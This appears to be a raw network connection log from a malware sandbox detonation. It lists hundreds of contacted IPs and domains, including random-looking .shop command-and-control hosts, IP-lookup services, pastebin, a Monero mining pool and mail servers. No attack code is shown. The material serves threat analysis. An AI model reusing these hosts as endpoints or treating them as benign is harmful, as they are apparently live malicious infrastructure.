US 104.21.20.181:443 fragmentyperspowp.shop tcp
US 8.8.8.8:53 181.20.21.104.in-addr.arpa udp
RU 195.2.70.38:30001 195.2.70.38 tcp
US 8.8.8.8:53 horsedwollfedrwos.shop udp
US 104.21.74.118:443 horsedwollfedrwos.shop tcp
US 8.8.8.8:53 cobusabobus.cam udp
NL 185.43.220.45:4383 cobusabobus.cam tcp
US 8.8.8.8:53 38.70.2.195.in-addr.arpa udp
US 8.8.8.8:53 118.74.21.104.in-addr.arpa udp
DE 195.10.205.90:4608 pepecasas123.net tcp
US 8.8.8.8:53 patternapplauderw.shop udp
US 104.21.55.248:443 patternapplauderw.shop tcp
US 8.8.8.8:53 45.220.43.185.in-addr.arpa udp
US 8.8.8.8:53 248.55.21.104.in-addr.arpa udp
US 8.8.8.8:53 understanndtytonyguw.shop udp
US 172.67.203.201:443 understanndtytonyguw.shop tcp
US 8.8.8.8:53 7.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 201.203.67.172.in-addr.arpa udp
US 8.8.8.8:53 considerrycurrentyws.shop udp
US 172.67.170.57:443 considerrycurrentyws.shop tcp
RU 62.113.116.83:28137 tcp
US 8.8.8.8:53 messtimetabledkolvk.shop udp
US 8.8.8.8:53 57.170.67.172.in-addr.arpa udp
US 104.21.8.238:443 messtimetabledkolvk.shop tcp
US 8.8.8.8:53 83.116.113.62.in-addr.arpa udp
US 8.8.8.8:53 238.8.21.104.in-addr.arpa udp
US 8.8.8.8:53 detailbaconroollyws.shop udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 drive.google.com udp
DE 185.172.128.69:80 185.172.128.69 tcp
GB 142.250.187.238:443 drive.google.com udp
US 172.67.193.11:443 detailbaconroollyws.shop tcp
RU 147.45.47.155:80 147.45.47.155 tcp
DE 185.172.128.69:80 185.172.128.69 tcp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 ssl.gstatic.com udp
GB 172.217.169.3:443 ssl.gstatic.com udp
US 8.8.8.8:53 11.193.67.172.in-addr.arpa udp
US 8.8.8.8:53 155.47.45.147.in-addr.arpa udp
US 8.8.8.8:53 deprivedrinkyfaiir.shop udp
US 172.67.134.244:443 deprivedrinkyfaiir.shop tcp
US 8.8.8.8:53 244.134.67.172.in-addr.arpa udp
N/A 10.127.0.1:135 tcp
US 172.67.190.237:443 relaxtionflouwerwi.shop tcp
US 8.8.8.8:53 237.190.67.172.in-addr.arpa udp
DE 185.172.128.69:80 185.172.128.69 tcp
DE 185.172.128.69:80 185.172.128.69 tcp
DE 185.172.128.69:80 185.172.128.69 tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 signaler-pa.clients6.google.com udp
GB 142.250.200.42:443 signaler-pa.clients6.google.com udp
N/A 10.127.0.1:135 tcp
KR 43.155.163.53:24543 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 104.21.79.77:443 yip.su tcp
US 8.8.8.8:53 53.163.155.43.in-addr.arpa udp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 77.79.21.104.in-addr.arpa udp
DE 185.172.128.82:80 185.172.128.82 tcp
RU 5.42.66.47:80 5.42.66.47 tcp
US 8.8.8.8:53 gigapub.ma udp
US 8.8.8.8:53 free.360totalsecurity.com udp
FR 51.75.247.100:443 gigapub.ma tcp
US 8.8.8.8:53 82.128.172.185.in-addr.arpa udp
RU 5.42.66.47:80 5.42.66.47 tcp
US 8.8.8.8:53 100.247.75.51.in-addr.arpa udp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
US 8.8.8.8:53 roomabolishsnifftwk.shop udp
US 172.67.146.92:443 roomabolishsnifftwk.shop tcp
US 8.8.8.8:53 92.146.67.172.in-addr.arpa udp
US 8.8.8.8:53 museumtespaceorsp.shop udp
N/A 10.127.0.1:445 tcp
US 104.21.32.80:443 museumtespaceorsp.shop tcp
N/A 10.127.0.1:139 tcp
US 8.8.8.8:53 iplogger.com udp
US 104.21.76.57:443 iplogger.com tcp
US 8.8.8.8:53 57.76.21.104.in-addr.arpa udp
US 8.8.8.8:53 buttockdecarderwiso.shop udp
US 172.67.218.187:443 buttockdecarderwiso.shop tcp
US 8.8.8.8:53 187.218.67.172.in-addr.arpa udp
US 8.8.8.8:53 averageaattractiionsl.shop udp
US 104.21.62.60:443 averageaattractiionsl.shop tcp
US 8.8.8.8:53 60.62.21.104.in-addr.arpa udp
US 8.8.8.8:53 femininiespywageg.shop udp
US 104.21.71.3:443 femininiespywageg.shop tcp
US 8.8.8.8:53 3.71.21.104.in-addr.arpa udp
RU 147.45.47.126:58709 tcp
US 8.8.8.8:53 employhabragaomlsp.shop udp
US 104.21.85.81:443 employhabragaomlsp.shop tcp
US 8.8.8.8:53 126.47.45.147.in-addr.arpa udp
US 8.8.8.8:53 81.85.21.104.in-addr.arpa udp
GB 142.250.200.42:443 signaler-pa.clients6.google.com udp
FI 37.27.61.181:445 tcp
US 8.8.8.8:53 stalfbaclcalorieeis.shop udp
FI 37.27.61.181:139 tcp
US 104.21.3.197:443 stalfbaclcalorieeis.shop tcp
GB 142.250.200.42:443 signaler-pa.clients6.google.com tcp
US 8.8.8.8:53 197.3.21.104.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
RU 147.45.47.126:58709 tcp
US 8.8.8.8:53 civilianurinedtsraov.shop udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 104.21.49.245:443 civilianurinedtsraov.shop tcp
US 104.26.4.15:443 db-ip.com tcp
DE 23.88.106.134:80 23.88.106.134 tcp
US 8.8.8.8:53 245.49.21.104.in-addr.arpa udp
US 8.8.8.8:53 134.106.88.23.in-addr.arpa udp
DE 185.172.128.19:80 185.172.128.19 tcp
RU 147.45.47.70:80 147.45.47.70 tcp
KR 43.155.163.53:24543 tcp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
KR 43.155.163.53:24543 tcp
FI 37.27.61.181:135 tcp
GB 142.250.187.238:443 accounts.youtube.com udp
US 34.117.186.192:443 ipinfo.io tcp
KR 221.143.49.222:80 221.143.49.222 tcp
US 104.26.4.15:443 db-ip.com tcp
US 8.8.8.8:53 222.49.143.221.in-addr.arpa udp
RU 147.45.47.70:80 147.45.47.70 tcp
RU 185.215.113.67:40960 tcp
US 8.8.8.8:53 67.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
US 8.8.8.8:53 tr.p.360safe.com udp
US 8.8.8.8:53 iup.360safe.com udp
FI 37.27.61.181:135 tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
US 8.8.8.8:53 s.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 xmr.2miners.com udp
US 8.8.8.8:53 int.down.360safe.com udp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 8.8.8.8:53 sd.p.360safe.com udp
US 104.192.108.21:80 int.down.360safe.com tcp
GB 99.86.249.197:80 sd.p.360safe.com tcp
US 8.8.8.8:53 197.249.86.99.in-addr.arpa udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 184.139.19.162.in-addr.arpa udp
RU 147.45.47.70:80 147.45.47.70 tcp
US 172.67.193.11:443 detailbaconroollyws.shop tcp
DE 185.172.128.33:8970 tcp
US 104.21.74.118:443 horsedwollfedrwos.shop tcp
US 8.8.8.8:53 33.128.172.185.in-addr.arpa udp
US 104.21.55.248:443 patternapplauderw.shop tcp
GB 85.192.56.26:80 85.192.56.26 tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.8.59:443 api.myip.com tcp
US 8.8.8.8:53 59.8.26.104.in-addr.arpa udp
US 172.67.203.201:443 understanndtytonyguw.shop tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
GB 172.217.169.67:443 beacons.gcp.gvt2.com udp
GB 172.217.169.3:443 ssl.gstatic.com udp
US 8.8.8.8:53 signaler-pa.clients6.google.com udp
US 172.67.170.57:443 considerrycurrentyws.shop tcp
FI 37.27.61.181:445 tcp
GB 142.250.178.10:443 signaler-pa.clients6.google.com udp
GB 172.217.169.3:443 ssl.gstatic.com tcp
GB 172.217.169.3:443 ssl.gstatic.com tcp
US 8.8.8.8:53 e2c42.gcp.gvt2.com udp
US 8.8.8.8:53 beacons2.gvt2.com udp
DE 35.207.191.46:443 e2c42.gcp.gvt2.com tcp
DE 35.207.191.46:443 e2c42.gcp.gvt2.com tcp
FI 37.27.61.181:139 tcp
KR 34.64.4.35:443 beacons2.gvt2.com udp
US 8.8.8.8:53 46.191.207.35.in-addr.arpa udp
US 8.8.8.8:53 35.4.64.34.in-addr.arpa udp
US 104.21.8.238:443 messtimetabledkolvk.shop tcp
US 8.8.8.8:53 beacons.gvt2.com udp
GB 172.217.169.3:443 beacons.gvt2.com udp
GB 172.217.169.3:443 beacons.gvt2.com tcp
GB 85.192.56.26:80 85.192.56.26 tcp
GB 142.250.187.238:443 accounts.youtube.com udp
GB 142.250.187.238:443 accounts.youtube.com tcp
GB 142.250.187.238:443 accounts.youtube.com tcp
US 172.67.134.244:443 deprivedrinkyfaiir.shop tcp
RU 91.215.85.135:80 91.215.85.135 tcp
US 8.8.8.8:53 relaxtionflouwerwi.shop udp
US 8.8.8.8:53 lop.foxesjoy.com udp
US 104.21.66.124:80 lop.foxesjoy.com tcp
US 104.21.66.124:80 lop.foxesjoy.com tcp
US 104.21.66.124:80 lop.foxesjoy.com tcp
US 104.21.76.64:443 relaxtionflouwerwi.shop tcp
US 8.8.8.8:53 vk.com udp
US 104.21.66.124:443 lop.foxesjoy.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
US 8.8.8.8:53 124.66.21.104.in-addr.arpa udp
US 8.8.8.8:53 64.76.21.104.in-addr.arpa udp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:443 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 45.130.41.108:80 monoblocked.com tcp
RU 45.130.41.108:80 monoblocked.com tcp
RU 5.42.66.10:80 5.42.66.10 tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 45.130.41.108:80 monoblocked.com tcp
BG 94.232.45.38:80 94.232.45.38 tcp
US 8.8.8.8:53 194.225.186.93.in-addr.arpa udp
RU 93.186.225.194:80 vk.com tcp
GB 142.250.179.238:443 play.google.com udp
RU 45.130.41.108:443 monoblocked.com tcp
TM 91.202.233.232:80 91.202.233.232 tcp
RU 93.186.225.194:443 vk.com tcp
DE 185.172.128.159:80 185.172.128.159 tcp
RU 5.42.66.10:80 5.42.66.10 tcp
US 8.8.8.8:53 10.66.42.5.in-addr.arpa udp
US 8.8.8.8:53 38.45.232.94.in-addr.arpa udp
US 8.8.8.8:53 232.233.202.91.in-addr.arpa udp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
DE 185.172.128.69:80 185.172.128.69 tcp
US 185.199.108.133:80 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 159.128.172.185.in-addr.arpa udp
DE 185.172.128.19:80 185.172.128.19 tcp
RU 5.42.66.10:80 5.42.66.10 tcp
US 8.8.8.8:53 226.20.18.104.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
DE 185.172.128.33:8970 tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
RU 93.186.225.194:80 vk.com tcp
US 8.8.8.8:53 177.101.63.23.in-addr.arpa udp
US 8.8.8.8:53 f.123654987.xyz udp
RU 5.42.66.10:80 5.42.66.10 tcp
RU 93.186.225.194:443 vk.com tcp
RU 93.186.225.194:443 vk.com tcp
RU 147.45.47.102:80 tcp
RU 93.186.225.194:443 vk.com tcp
US 8.8.8.8:53 sun6-22.userapi.com udp
RU 93.186.225.194:80 vk.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.27.84:443 accounts.google.com udp
NL 142.250.27.84:443 accounts.google.com tcp
RU 93.186.225.194:80 vk.com tcp
NL 95.142.206.2:443 sun6-22.userapi.com tcp
NL 95.142.206.2:443 sun6-22.userapi.com tcp
RU 93.186.225.194:443 vk.com tcp
US 8.8.8.8:53 c.urs.microsoft.com udp
GB 20.58.112.186:443 c.urs.microsoft.com tcp
GB 20.58.112.186:443 c.urs.microsoft.com tcp
RU 147.45.47.102:57893 147.45.47.102 tcp
US 8.8.8.8:53 sun6-21.userapi.com udp
NL 95.142.206.1:443 sun6-21.userapi.com tcp
US 8.8.8.8:53 2.206.142.95.in-addr.arpa udp
US 8.8.8.8:53 186.112.58.20.in-addr.arpa udp
US 8.8.8.8:53 102.47.45.147.in-addr.arpa udp
US 8.8.8.8:53 1.206.142.95.in-addr.arpa udp
US 104.192.108.20:80 int.down.360safe.com tcp
DE 185.172.128.19:80 185.172.128.19 tcp
RU 147.45.47.102:80 tcp
RU 147.45.47.102:80 tcp
US 8.8.8.8:53 coatdetail.fun udp
US 104.192.108.17:80 int.down.360safe.com tcp
SE 194.54.164.123:80 coatdetail.fun tcp
US 8.8.8.8:53 123.164.54.194.in-addr.arpa udp
US 8.8.8.8:53 download.winzip.com udp
NL 23.62.61.144:443 download.winzip.com tcp
US 8.8.8.8:53 144.61.62.23.in-addr.arpa udp
RU 147.45.47.102:57893 147.45.47.102 tcp
GB 142.250.178.10:443 signaler-pa.clients6.google.com udp
RU 147.45.47.102:80 tcp
RU 147.45.47.126:58709 tcp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 216.239.32.116:443 beacons4.gvt2.com udp
US 104.192.108.17:80 int.down.360safe.com tcp
US 216.239.32.116:443 beacons4.gvt2.com tcp
GB 172.217.169.3:443 beacons.gvt2.com udp
GB 172.217.169.3:443 beacons.gvt2.com tcp
RU 45.130.41.108:443 monoblocked.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
GB 172.217.169.3:443 beacons.gvt2.com tcp
GB 172.217.169.3:443 beacons.gvt2.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
RU 5.42.65.116:50500 tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 8.8.8.8:53 116.65.42.5.in-addr.arpa udp
RU 147.45.47.126:58709 tcp
DE 52.29.179.141:80 s.360safe.com tcp
GB 142.250.179.238:443 play.google.com udp
DE 23.88.106.134:80 23.88.106.134 tcp
RU 185.215.113.67:40960 tcp
US 8.8.8.8:53 f.123654987.xyz udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 104.26.4.15:443 db-ip.com tcp
US 8.8.8.8:53 lubriaceites.com udp
US 212.1.210.79:443 lubriaceites.com tcp
US 8.8.8.8:53 79.210.1.212.in-addr.arpa udp
CN 36.249.46.172:8765 tcp
US 8.8.8.8:53 f.123654987.xyz udp
US 8.8.8.8:53 f.123654987.xyz udp
US 8.8.8.8:53 detailbaconroollyws.shop udp
RU 5.42.66.47:80 5.42.66.47 tcp
US 104.21.76.102:443 detailbaconroollyws.shop tcp
US 8.8.8.8:53 102.76.21.104.in-addr.arpa udp
CN 36.249.46.172:8765 tcp
US 34.117.186.192:443 ipinfo.io tcp
US 172.67.146.92:443 roomabolishsnifftwk.shop tcp
US 8.8.8.8:53 horsedwollfedrwos.shop udp
US 8.8.8.8:53 db-ip.com udp
GB 172.217.169.3:443 beacons.gvt2.com udp
US 172.67.157.243:443 horsedwollfedrwos.shop tcp
US 104.26.5.15:443 db-ip.com tcp
US 8.8.8.8:53 25.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 243.157.67.172.in-addr.arpa udp
US 8.8.8.8:53 15.5.26.104.in-addr.arpa udp
US 8.8.8.8:53 patternapplauderw.shop udp
US 104.21.32.80:443 museumtespaceorsp.shop tcp
US 172.67.174.208:443 patternapplauderw.shop tcp
US 8.8.8.8:53 208.174.67.172.in-addr.arpa udp
US 172.67.218.187:443 buttockdecarderwiso.shop tcp
US 172.67.203.201:443 understanndtytonyguw.shop tcp
GB 142.250.187.238:443 accounts.youtube.com udp
SG 118.194.235.187:50500 tcp
GB 142.250.187.238:443 accounts.youtube.com tcp
DE 185.172.128.33:8970 tcp
GB 142.250.179.238:443 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 signaler-pa.clients6.google.com udp
US 104.21.62.60:443 averageaattractiionsl.shop tcp
GB 142.250.179.234:443 signaler-pa.clients6.google.com udp
US 8.8.8.8:53 www.installportal.com udp
US 50.112.27.9:443 www.installportal.com tcp
GB 142.250.179.234:443 signaler-pa.clients6.google.com tcp
US 172.67.170.57:443 considerrycurrentyws.shop tcp
US 8.8.8.8:53 clients6.google.com udp
US 8.8.8.8:53 drive-thirdparty.googleusercontent.com udp
GB 142.250.187.238:443 clients6.google.com udp
GB 172.217.16.225:443 drive-thirdparty.googleusercontent.com udp
US 8.8.8.8:53 9.27.112.50.in-addr.arpa udp
GB 142.250.187.238:443 clients6.google.com tcp
GB 172.217.16.225:443 drive-thirdparty.googleusercontent.com tcp
US 104.21.71.3:443 femininiespywageg.shop tcp
CN 58.23.215.26:8765 tcp
US 104.21.8.238:443 messtimetabledkolvk.shop tcp
US 104.21.85.81:443 employhabragaomlsp.shop tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 104.26.5.15:443 db-ip.com tcp
US 104.21.3.197:443 stalfbaclcalorieeis.shop tcp
US 172.67.134.244:443 deprivedrinkyfaiir.shop tcp
US 104.21.49.245:443 civilianurinedtsraov.shop tcp
US 104.21.76.64:443 relaxtionflouwerwi.shop tcp
CN 58.23.215.26:8765 tcp
RU 5.42.65.116:80 5.42.65.116 tcp
GB 172.217.169.3:443 beacons.gvt2.com udp
GB 172.217.169.3:443 beacons.gvt2.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
MD 94.103.188.126:80 94.103.188.126 tcp
NL 204.137.14.135:80 204.137.14.135 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.27.84:443 accounts.google.com udp
GB 142.250.200.14:443 apis.google.com udp
US 104.21.79.77:443 yip.su tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 135.14.137.204.in-addr.arpa udp
US 8.8.8.8:53 kstatic.googleusercontent.com udp
DE 185.172.128.82:80 185.172.128.82 tcp
US 35.241.11.240:443 kstatic.googleusercontent.com udp
US 8.8.8.8:53 apps.google.com udp
US 8.8.8.8:53 workspace.google.com udp
US 142.93.113.93:80 142.93.113.93 tcp
FR 51.75.247.100:443 gigapub.ma tcp
US 35.241.11.240:443 kstatic.googleusercontent.com tcp
US 35.241.11.240:443 kstatic.googleusercontent.com tcp
US 35.241.11.240:443 kstatic.googleusercontent.com tcp
US 35.241.11.240:443 kstatic.googleusercontent.com tcp
US 35.241.11.240:443 kstatic.googleusercontent.com tcp
US 8.8.8.8:53 93.113.93.142.in-addr.arpa udp
RU 5.42.66.47:80 5.42.66.47 tcp
US 8.8.8.8:53 free.360totalsecurity.com udp
RU 5.42.66.47:80 5.42.66.47 tcp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
US 8.8.8.8:53 beacons.gvt2.com udp
US 192.178.49.163:443 beacons.gvt2.com udp
US 192.178.49.163:443 beacons.gvt2.com tcp
GB 142.250.179.234:443 signaler-pa.clients6.google.com udp
US 8.8.8.8:53 about.google udp
GB 142.250.179.234:443 signaler-pa.clients6.google.com tcp
US 8.8.8.8:53 acrobat.adobe.com udp
US 8.8.8.8:53 blogs.autodesk.com udp
US 8.8.8.8:53 checkforupdate.sytes.net udp
GB 172.217.169.3:443 beacons.gvt2.com udp
US 8.8.8.8:53 cloud.google.com udp
US 8.8.8.8:53 help.salesforce.com udp
US 8.8.8.8:53 marketplace.atlassian.com udp
NL 204.137.14.135:443 tcp
US 8.8.8.8:53 one.google.com udp
GB 172.217.169.3:443 beacons.gvt2.com tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 192.178.49.195:443 beacons.gcp.gvt2.com udp
GB 172.217.169.3:443 beacons.gvt2.com tcp
US 8.8.8.8:53 policies.google.com udp
US 192.178.49.195:443 beacons.gcp.gvt2.com tcp
US 192.178.49.195:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 services.google.com udp
US 8.8.8.8:53 slack.com udp
US 8.8.8.8:53 support.google.com udp
US 8.8.8.8:53 195.49.178.192.in-addr.arpa udp
US 8.8.8.8:53 www.docusign.com udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 yip.su udp
US 104.21.79.77:443 yip.su tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
DE 185.172.128.82:80 185.172.128.82 tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 gigapub.ma udp
FR 51.75.247.100:443 gigapub.ma tcp
RU 5.42.66.47:80 5.42.66.47 tcp
US 8.8.8.8:53 free.360totalsecurity.com udp
RU 5.42.66.47:80 5.42.66.47 tcp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 considerrycurrentyws.shop udp
US 104.21.28.32:443 considerrycurrentyws.shop tcp
US 8.8.8.8:53 lh3.google.com udp
GB 172.217.16.238:443 lh3.google.com udp
US 172.67.157.243:443 horsedwollfedrwos.shop tcp
US 172.67.174.208:443 patternapplauderw.shop tcp
DE 185.172.128.19:80 185.172.128.19 tcp
GB 142.250.187.238:443 www.youtube.com udp
US 8.8.8.8:53 understanndtytonyguw.shop udp
GB 142.250.187.238:443 www.youtube.com tcp
US 104.21.22.94:443 understanndtytonyguw.shop tcp
US 192.178.49.195:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.225:443 lh3.googleusercontent.com udp
GB 172.217.16.225:443 lh3.googleusercontent.com tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 94.22.21.104.in-addr.arpa udp
NL 142.250.27.84:443 accounts.google.com udp
US 8.8.8.8:53 apis.google.com udp
US 8.8.8.8:53 messtimetabledkolvk.shop udp
US 104.21.8.238:443 messtimetabledkolvk.shop tcp
US 8.8.8.8:53 drivefrontend-pa.clients6.google.com udp
GB 142.250.179.234:443 signaler-pa.clients6.google.com udp
GB 172.217.16.234:443 drivefrontend-pa.clients6.google.com udp
GB 172.217.16.234:443 drivefrontend-pa.clients6.google.com tcp
GB 172.217.16.234:443 drivefrontend-pa.clients6.google.com udp
US 104.21.76.102:443 detailbaconroollyws.shop tcp
GB 172.217.16.234:443 drivefrontend-pa.clients6.google.com tcp
US 8.8.8.8:53 11.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 deprivedrinkyfaiir.shop udp
US 104.21.25.251:443 deprivedrinkyfaiir.shop tcp
US 8.8.8.8:53 251.25.21.104.in-addr.arpa udp
US 104.21.76.64:443 relaxtionflouwerwi.shop tcp
HK 154.220.255.214:80 154.220.255.214 tcp
US 8.8.8.8:53 214.255.220.154.in-addr.arpa udp
US 8.8.8.8:53 ogads-pa.clients6.google.com udp
GB 142.250.187.234:443 ogads-pa.clients6.google.com udp
GB 142.250.187.234:443 ogads-pa.clients6.google.com tcp
RU 147.45.47.70:80 147.45.47.70 tcp
US 8.8.8.8:53 people-pa.clients6.google.com udp
GB 216.58.212.202:443 people-pa.clients6.google.com udp
VN 115.78.235.2:58080 115.78.235.2 tcp
US 8.8.8.8:53 2.235.78.115.in-addr.arpa udp
US 8.8.8.8:53 drive.fife.usercontent.google.com udp
GB 142.250.187.225:443 drive.fife.usercontent.google.com udp
GB 142.250.187.225:443 drive.fife.usercontent.google.com tcp
US 8.8.8.8:53 peoplestack-pa.clients6.google.com udp
GB 216.58.204.74:443 peoplestack-pa.clients6.google.com udp
GB 216.58.204.74:443 peoplestack-pa.clients6.google.com tcp
NL 142.93.134.128:80 ip.bablosoft.com tcp
US 8.8.8.8:53 www.google.com udp
GB 172.217.169.3:443 beacons.gvt2.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 128.134.93.142.in-addr.arpa udp
GB 172.217.16.234:443 drivefrontend-pa.clients6.google.com udp
GB 172.217.16.234:443 drivefrontend-pa.clients6.google.com tcp
RU 93.171.206.121:80 check.best-proxies.ru tcp
US 104.248.53.100:80 104.248.53.100 tcp
US 8.8.8.8:53 121.206.171.93.in-addr.arpa udp
US 8.8.8.8:53 100.53.248.104.in-addr.arpa udp
US 8.8.8.8:53 tumanovalekcey.github.io udp
US 185.199.111.153:443 tumanovalekcey.github.io tcp
US 8.8.8.8:53 153.111.199.185.in-addr.arpa udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
RU 93.171.206.121:80 check.best-proxies.ru tcp
US 8.8.8.8:53 google.com udp
US 192.178.49.195:443 beacons.gcp.gvt2.com udp
GB 142.250.178.14:443 google.com tcp
GB 142.250.178.14:443 google.com tcp
DE 52.98.171.242:25 tcp
FI 74.125.205.147:443 tcp
RU 5.61.236.236:443 tcp
US 104.244.42.194:443 tcp
SE 31.13.72.8:443 tcp
NL 149.154.167.220:443 tcp
RU 176.114.120.2:443 tcp
GB 142.250.179.234:443 signaler-pa.clients6.google.com udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 194.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 8.72.13.31.in-addr.arpa udp
US 8.8.8.8:53 147.205.125.74.in-addr.arpa udp
US 8.8.8.8:53 236.236.61.5.in-addr.arpa udp
US 8.8.8.8:53 2.120.114.176.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 beacons2.gvt2.com udp
IN 142.250.67.195:443 beacons2.gvt2.com udp
IN 142.250.67.195:443 beacons2.gvt2.com tcp
US 8.8.8.8:53 195.67.250.142.in-addr.arpa udp
KR 103.219.124.16:80 103.219.124.16 tcp
US 8.8.8.8:53 16.124.219.103.in-addr.arpa udp
DE 49.13.194.118:80 49.13.194.118 tcp
SG 118.194.235.187:50500 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 lesta.ru udp
RU 95.181.181.87:443 lesta.ru tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 api.vk.com udp
RU 87.240.190.75:443 api.vk.com tcp
US 8.8.8.8:53 75.190.240.87.in-addr.arpa udp
US 8.8.8.8:53 steamcommunity.com udp
BE 104.68.92.92:443 steamcommunity.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 92.92.68.104.in-addr.arpa udp
US 8.8.8.8:53 api.steampowered.com udp
BE 104.68.92.92:443 api.steampowered.com tcp
US 8.8.8.8:53 dukeenergyltd.top udp
RU 87.240.190.75:443 api.vk.com tcp
US 104.26.5.15:443 db-ip.com tcp
US 104.21.25.202:443 dukeenergyltd.top tcp
US 8.8.8.8:53 outlook.office365.com udp
GB 40.99.213.34:993 outlook.office365.com tcp
US 8.8.8.8:53 202.25.21.104.in-addr.arpa udp
US 8.8.8.8:53 www.southstar.com.tw udp
US 8.8.8.8:53 34.213.99.40.in-addr.arpa udp
TW 219.84.199.61:443 www.southstar.com.tw tcp
US 8.8.8.8:53 61.199.84.219.in-addr.arpa udp
GB 40.99.213.34:993 outlook.office365.com tcp
GB 40.99.213.34:993 outlook.office365.com tcp
GB 40.99.213.34:993 outlook.office365.com tcp
GB 85.192.56.26:80 85.192.56.26 tcp
GB 85.192.56.26:80 85.192.56.26 tcp
GB 40.99.213.34:993 outlook.office365.com tcp
US 8.8.8.8:53 outlook.office365.com udp
GB 52.98.207.130:993 outlook.office365.com tcp
GB 52.98.207.130:993 outlook.office365.com tcp
CN 47.104.173.216:9876 tcp
US 8.8.8.8:53 130.207.98.52.in-addr.arpa udp
